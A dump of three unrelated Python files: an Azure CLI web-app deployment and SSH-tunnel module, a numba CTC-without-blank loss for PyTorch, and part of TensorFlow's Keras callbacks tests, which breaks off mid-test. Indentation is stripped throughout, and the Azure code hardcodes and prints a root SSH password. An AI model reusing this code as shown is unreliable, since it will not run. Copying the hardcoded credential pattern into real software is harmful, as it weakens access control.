_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. Currently no way to poll for this
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
result = client.web_apps.delete_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
raw=True)
result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
ctc_without_blank.py
|
import queue
import threading
import numba
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Function, Variable
from pytorch_end2end.functions.utils import log_sum_exp
@numba.jit(nogil=True)
def _ctc_without_blank_loss(logits, targets, space_idx):
"""
http://www.cs.toronto.edu/~graves/icml_2006.pdf
:param logits: numpy array, sequence_len * num_labels
:param targets: numpy array, target labels
:param blank: blank index
:return: loss (float), gradient (same shape as logits)
"""
targets_len = targets.shape[0]
prediction_len = logits.shape[0]
num_labels = logits.shape[1]
using_additional_spaces = False
if targets_len == 0 or (targets_len == 1 and targets[0] == space_idx):
extended_targets_len = 1
extended_targets = np.ones(extended_targets_len, dtype=np.int64) * space_idx
elif space_idx == -1:
extended_targets_len = targets_len
extended_targets = targets
else:
using_additional_spaces = True
extended_targets_len = targets_len + 2
extended_targets = np.ones(extended_targets_len, dtype=np.int64) * space_idx
extended_targets[1:extended_targets_len - 1] = targets
# alpha and beta computation
# forward - alpha
log_alpha = np.zeros((extended_targets_len, prediction_len))
log_alpha[:] = -np.inf # numba bugfix instead of log_alpha.fill(-np.inf)
if prediction_len > 1 or extended_targets_len == 1:
log_alpha[0, 0] = logits[0, extended_targets[0]]
if extended_targets_len > 1 and using_additional_spaces:
log_alpha[1, 0] = logits[0, extended_targets[1]]
for t in range(1, prediction_len): # timesteps
start = max(0, extended_targets_len - prediction_len + t - 1) if using_additional_spaces \
else max(0, extended_targets_len - prediction_len + t)
end = min(t + 2, extended_targets_len) if using_additional_spaces else min(t + 1, extended_targets_len)
log_alpha[start:end, t] = log_alpha[start:end, t - 1]
for j in range(start, end):
current_label = extended_targets[j]
if j > 0:
log_alpha[j, t] = log_sum_exp(log_alpha[j, t], log_alpha[j - 1, t - 1])
log_alpha[j, t] += logits[t, current_label]
if extended_targets_len > 1 and using_additional_spaces:
loss_forward = log_sum_exp(log_alpha[extended_targets_len - 1, prediction_len - 1],
log_alpha[extended_targets_len - 2, prediction_len - 1])
else:
loss_forward = log_alpha[extended_targets_len - 1, prediction_len - 1]
# backward - beta
log_beta = np.zeros((extended_targets_len, prediction_len))
log_beta[:] = -np.inf # numba bugfix instead of log_beta.fill(-np.inf)
if prediction_len > 1 or extended_targets_len == 1:
log_beta[extended_targets_len - 1, prediction_len - 1] = 0
if extended_targets_len > 1 and using_additional_spaces:
log_beta[extended_targets_len - 2, prediction_len - 1] = 0
for t in range(prediction_len - 2, -1, -1): # timesteps
start = max(0, extended_targets_len - prediction_len + t - 1) if using_additional_spaces \
else max(0, extended_targets_len - prediction_len + t)
end = min(t + 2, extended_targets_len) if using_additional_spaces else min(t + 1, extended_targets_len)
for j in range(start, end):
log_beta[j, t] = log_beta[j, t + 1] + logits[t + 1, extended_targets[j]]
if j < extended_targets_len - 1:
log_beta[j, t] = log_sum_exp(log_beta[j, t],
log_beta[j + 1, t + 1] + logits[t + 1, extended_targets[j + 1]])
alpha_beta = log_alpha + log_beta
prob_sum = np.zeros((prediction_len, num_labels))
prob_sum[:] = -np.inf
for i in range(extended_targets_len):
current_label = extended_targets[i]
prob_sum[:, current_label] = log_sum_exp(prob_sum[:, current_label], alpha_beta[i, :])
negative_term = prob_sum - loss_forward
grad = np.exp(logits) - np.exp(negative_term)
return -loss_forward, grad
def _ctc_without_blank_3d_loss(logits, targets, logits_lengths, targets_length, space_idx=-1):
batch_size = len(targets_length)
grads = np.zeros_like(logits)
losses = np.zeros(batch_size)
# parallel computation, threading - because gil is released with numba.jit(nogil=True)
que = queue.Queue()
threads = []
for i in range(batch_size):
t = threading.Thread(target=lambda q, i, *args: q.put((i, _ctc_without_blank_loss(*args))),
args=(que, i, logits[i, :logits_lengths[i], :],
targets[i, :targets_length[i]], space_idx))
threads.append(t)
t.start()
for t in threads:
t.join()
while not que.empty():
i, (loss, grad) = que.get()
grads[i, :logits_lengths[i], :] = grad
losses[i] = loss
return losses, grads
class CTCWithoutBlankLossFunction(Function):
@staticmethod
def forward(ctx, logits, targets, logits_lengths, targets_lengths, space_idx=-1):
# logits: expected shape of batch_size * sequence_length * num_labels, after logsoftmax!
loss, grads = _ctc_without_blank_3d_loss(logits.cpu().numpy(), targets.cpu().numpy(),
logits_lengths.cpu().numpy(), targets_lengths.cpu().numpy(), space_idx)
ctx.grads = torch.FloatTensor(grads) # save for backward not works!
if logits.is_cuda:
return torch.FloatTensor(loss).cuda(logits.get_device())
return torch.FloatTensor(loss)
@staticmethod
def backward(ctx, grad_output):
"""
:param grad_output: [batch_size]
:return:
"""
loss_grads = Variable(ctx.grads)
if grad_output.is_cuda:
loss_grads = loss_grads.cuda(grad_output.get_device())
grad = loss_grads.contiguous() * grad_output.contiguous().view(-1, 1, 1)
return grad, None, None, None, None
if __name__ == "__main__":
from torch.autograd import gradcheck
# gradchek takes a tuple of tensor as input, check if your gradient
# evaluated with these tensors are close enough to numerical
# approximations and returns True if they all verify this condition.
# alphabet_size = 30
# max_targets_len = 50
# max_sequence_len = 100
# batch_size = 2
alphabet_size = 5
max_targets_len = 100
max_sequence_len = 200
# max_targets_len = 5
# max_sequence_len = 6
batch_size = 1
np.random.seed(523)
targets_lengths = np.random.randint(1, max_targets_len + 1, batch_size)
logits_lengths = targets_lengths + np.random.randint(0, (max_sequence_len - max_targets_len) + 1, batch_size)
logits = np.random.randn(batch_size, max_sequence_len, alphabet_size)
targets = (1 + np.random.rand(batch_size, max_targets_len) * alphabet_size).astype(np.int64)
input = (nn.LogSoftmax(dim=2)(Variable(torch.FloatTensor(logits), requires_grad=True)),
Variable(torch.LongTensor(targets), requires_grad=False),
Variable(torch.LongTensor(logits_lengths), requires_grad=False),
Variable(torch.LongTensor(targets_lengths), requires_grad=False))
print(CTCWithoutBlankLossFunction.apply(*input).data)
test = gradcheck(CTCWithoutBlankLossFunction.apply, input) # , atol=1e-5, rtol=1e-5)
print(test)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
